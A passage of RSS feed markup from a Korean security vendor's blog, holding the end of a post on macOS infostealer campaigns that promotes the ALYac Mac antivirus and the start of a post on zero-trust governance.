srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fv6M9f%2FdJMcaajShFD%2FxKhv8MqKkKipKfmDB1h6Rk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;989&quot; height=&quot;735&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;989&quot; data-origin-height=&quot;735&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;&amp;lsquo;신뢰 가능한 도구&amp;rsquo;를 가장한 침투 방식&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 공격의 가장 큰 특징은 macOS 사용자들이 일상적으로 신뢰해온 플랫폼과 도구를 교묘하게 악용했다는 점입니다. 공격자는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;AMOS(Atomic macOS Stealer)와 같은 macOS 전용 인포스틸러를 활용해 정상적인 소프트웨어, 개발 도구, PDF 유틸리티, 메신저 등으로 위장합니다. 특히 파이썬 기반 스크립트를 통해 설치 및 실행 과정을 자동화하고, macOS의 내장 유틸리티와 자동화 기능을 악용함으로써 기존 보안 솔루션의 탐지를 우회합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;여기에 터미널 명령어를 그대로 복사&amp;middot;실행하도록 유도하는 사회공학 기법도 함께 사용됩니다. 개발자나 IT 실무자에게 익숙한 작업 방식이라는 점을 노린 것으로, 사용자의 단 한 번의 실행이 시스템 전반의 정보 탈취로 이어질 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;개인 단말 침해에서 기업 리스크로의 확산&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이러한 인포스틸러 공격의 위험성은 단순한 개인 정보 유출에 그치지 않습니다. 맥 환경에서 관리되던 기업 소스 코드, 클라우드 접근 권한, 협업 도구 계정 정보가 탈취될 경우, 이는 공급망 공격이나 랜섬웨어로 이어지는 2차 피해의 출발점이 될 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 최근 기업 환경에서는 개발&amp;middot;디자인&amp;middot;기획 조직을 중심으로 macOS 사용 비중이 빠르게 증가하고 있으며, 클라우드 기반 업무와 외부 협업이 일상화된 상황입니다. 공격자는 단 한 대의 맥 단말을 발판으로 조직 내부로 침투할 수 있는 구조를 이미 확보하고 있는 셈입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;macOS 환경에서도 요구되는 전문적인 보안 대응&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 사례를 통해 우리는 분명히 알 수 있습니다. '맥은 상대적으로 안전하다'는 인식은 더 이상 유효하지 않습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;신뢰 가능한 플랫폼과 정상적인 업무 흐름을 악용하는 지능형 공격이 증가하는 상황에서, 운영체제 기본 보안 기능만으로는 위협을 식별하고 대응하기 어렵습니다. macOS 환경 역시 행위 기반 탐지, 실시간 모니터링, 중앙 관리가 가능한 전문적인 엔드포인트 보안 체계와 함께, 사용자 보안 인식 강화가 병행돼야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;macOS 환경까지 고려한 엔드포인트 보안 전략&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;macOS를 겨냥한 인포스틸러 공격이 현실화된 지금, 기업 보안 전략 역시 운영체제 중심이 아닌 엔드포인트 전체를 아우르는 관점으로 확장될 필요가 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;특히 맥과 윈도우가 혼재된 환경에서는 특정 OS만을 기준으로 한 대응 방식이 오히려 보안 사각지대를 만들 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  Plus Tip! mac OS를 위한 최적의 백신 솔루션&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;a href=&quot;https://www.estsecurity.com/enterprise/product/alyac-mac&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;알약 Mac&lt;/a&gt;&lt;/b&gt;은 macOS 전용 악성코드뿐 아니라 윈도우 기반 위협까지 함께 탐지하는 크로스 플랫폼 대응을 제공하며, 중앙 관리 시스템과 연동해 보안 정책 적용과 로그 관리까지 일관되게 운영할 수 있도록 지원합니다. 업무 환경에 부담을 주지 않는 경량 설계와 실시간 탐지 기능을 통해, 맥 환경에서도 점점 정교해지는 인포스틸러 공격에 선제적으로 대응할 수 있는 기반을 마련할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;맥이 더 이상 '안전지대'가 아닌 지금, OS 구분 없는 엔드포인트 보안 전략은 선택이 아닌 필수가 되고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 - 2026-02-05T150400.180.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Da1uE/dJMcaaxpObq/1x1kASbDHoVuPlllGyq4g1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Da1uE/dJMcaaxpObq/1x1kASbDHoVuPlllGyq4g1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Da1uE/dJMcaaxpObq/1x1kASbDHoVuPlllGyq4g1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FDa1uE%2FdJMcaaxpObq%2F1x1kASbDHoVuPlllGyq4g1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1000&quot; data-filename=&quot;다운로드 - 2026-02-05T150400.180.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 - 2026-02-05T150404.898.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Ucq1Q/dJMcaioGdHU/HLPsa37TRwesELTRhYHU4k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Ucq1Q/dJMcaioGdHU/HLPsa37TRwesELTRhYHU4k/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Ucq1Q/dJMcaioGdHU/HLPsa37TRwesELTRhYHU4k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FUcq1Q%2FdJMcaioGdHU%2FHLPsa37TRwesELTRhYHU4k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1000&quot; data-filename=&quot;다운로드 - 2026-02-05T150404.898.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 - 2026-02-05T150408.346.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b6dEvl/dJMcafS1jpv/qk88p3L4XWKrza5zuqt9c0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b6dEvl/dJMcafS1jpv/qk88p3L4XWKrza5zuqt9c0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b6dEvl/dJMcafS1jpv/qk88p3L4XWKrza5zuqt9c0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb6dEvl%2FdJMcafS1jpv%2Fqk88p3L4XWKrza5zuqt9c0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1000&quot; data-filename=&quot;다운로드 - 2026-02-05T150408.346.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 - 2026-02-05T150414.470.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bly8Ev/dJMcaioGdHZ/4dLTeXQGD09pzJKbuZS1FK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bly8Ev/dJMcaioGdHZ/4dLTeXQGD09pzJKbuZS1FK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bly8Ev/dJMcaioGdHZ/4dLTeXQGD09pzJKbuZS1FK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbly8Ev%2FdJMcaioGdHZ%2F4dLTeXQGD09pzJKbuZS1FK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1000&quot; height=&quot;1000&quot; data-filename=&quot;다운로드 - 2026-02-05T150414.470.png&quot; data-origin-width=&quot;1000&quot; data-origin-height=&quot;1000&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;macOS 보안 인식 전환과 기업 대응의 필요성&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;macOS를 사용하는 기업 환경에서는 '맥은 상대적으로 안전하다'는 막연한 믿음 대신, 우리 조직의 맥 환경이 실제 공격 시나리오에 얼마나 노출돼 있는지 구체적으로 파악해야 합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이스트시큐리티는 macOS를 포함한 엔드포인트 환경 전반에 대한 보안 컨설팅을 제공합니다. 단순히 보안 제품을 도입하는 것을 넘어, 귀사의 업무 구조와 협업 환경을 분석해 실제 공격이 발생했을 때 어떤 경로로 피해가 확산될 수 있는지를 시뮬레이션하고, 이를 차단할 수 있는 맞춤형 대응 체계를 수립합니다. 특히 개발&amp;middot;디자인&amp;middot;기획 조직의 맥 사용 환경에서 발생할 수 있는 보안 사각지점을 선제적으로 점검하고, 조직 상황에 맞는 현실적인 보안 정책을 마련할 수 있도록 지원합니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;&lt;span style=&quot;color: #1b711d;&quot;&gt;&lt;b&gt;&lt;u&gt;알약 Mac&lt;/u&gt;은 이러한 보안 체계 구축의 핵심 솔루션으로, macOS 전용 악성코드 탐지부터 윈도우 기반 위협 대응까지 통합 관리할 수 있는 기반을 제공합니다.&lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;macOS가 더 이상 '안전지대'가 아닌 지금, 귀사의 맥 환경이 실제 위협에 얼마나 대비되어 있는지 점검해보시기 바랍니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;&gt;&lt;a href=&quot;https://bit.ly/4nsdIJE&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/yiSHe/dJMcaaEbibq/B7BzWXW5PVW018HxnzRO71/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FyiSHe%2FdJMcaaEbibq%2FB7BzWXW5PVW018HxnzRO71%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;330&quot; height=&quot;70&quot; data-filename=&quot;Group 485151 (3).png&quot; data-origin-width=&quot;996&quot; data-origin-height=&quot;212&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>MacOS</category>
      <category>mac보안</category>
      <category>기업보안</category>
      <category>보안동향</category>
      <category>알약Mac</category>
      <category>인포스틸러</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5713</guid>
      <comments>https://alyacofficialblog.tistory.com/5713#entry5713comment</comments>
      <pubDate>Thu, 5 Feb 2026 15:41:28 +0900</pubDate>
    </item>
    <item>
      <title>제로트러스트는 왜 '거버넌스'에서 완성될까? '기술'에서 '운영 체계'로 전환되는 보안 전략의 핵심!</title>
      <link>https://alyacofficialblog.tistory.com/5712</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트(Zero Trust)는 더 이상 새로운 개념이 아닙니다. 그럼에도 불구하고 최근 기업 보안 환경에서 이 키워드가 다시 주목받는 이유는 분명합니다. 랜섬웨어, 내부자 위협, 공급망 공격처럼 경계 내부에서 시작되는 보안 사고가 일상화되었기 때문입니다. 기존의 경계 기반 보안만으로는 더 이상 기업의 핵심 자산을 충분히 보호하기 어렵다는 현실이 분명해지고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이 지점에서 하나의 질문에 도달하게 됩니다. '제로트러스트는 과연 기술 도입만으로 완성될 수 있을까요?' &lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;답은 분명히 'NO'입니다. 그리고 그 핵심에는 &lt;b&gt;거버넌스(Governance)&lt;/b&gt;가 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cmqRmX/dJMcac2ZAeD/iaLvyziBDIX5SVdHbjOGJK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cmqRmX/dJMcac2ZAeD/iaLvyziBDIX5SVdHbjOGJK/img.png&quot; data-alt=&quot;[이미지] 생성형 AI 제작&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cmqRmX/dJMcac2ZAeD/iaLvyziBDIX5SVdHbjOGJK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcmqRmX%2FdJMcac2ZAeD%2FiaLvyziBDIX5SVdHbjOGJK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1536&quot; height=&quot;1024&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[이미지] 생성형 AI 제작&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;  &lt;/span&gt;솔루션은 도입했는데, 왜 보안은 여전히 불안할까?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;많은 기업이 마주한 제로트러스트의 현실&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;많은 기업이 제로트러스트를 VPN 대체, MFA 도입, 접근제어 강화 수준으로 이해하고 있습니다. 실제로 관련 솔루션을 이미 도입한 기업도 적지 않습니다. 그러나 이러한 접근은 제로트러스트의 일부만 구현한 상태에 불과합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;제로트러스트의 본질은 단순한 기술 적용이 아니라, 신뢰를 전제로 한 구조 자체를 해체하고 모든 접근을 정책과 검증의 대상으로 만드는 운영 원칙이기 때문입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;현장에서 자주 나타나는 문제는 다음과 같습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 솔루션은 늘어났지만 보안 정책은 여전히 파편화된 상태&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 이상 행위는 탐지되지만, 누가 어떻게 대응해야 하는지 불명확&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 사고 발생 시 책임 소재와 판단 기준이 모호&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;▪︎ 규제 대응을 위한 감사 추적과 이력 관리가 제대로 이루어지지 않음&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;이러한 문제들은 기술의 부족이 아니라 거버넌스의 부재에서 발생합니다.&lt;/span&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #006dd7; font-family: 'Noto Sans Demilight', 'Noto Sans KR';&quot;&gt;&lt;b&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt; &lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;왜 지금 '제로트러스트 거버넌스'인가&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
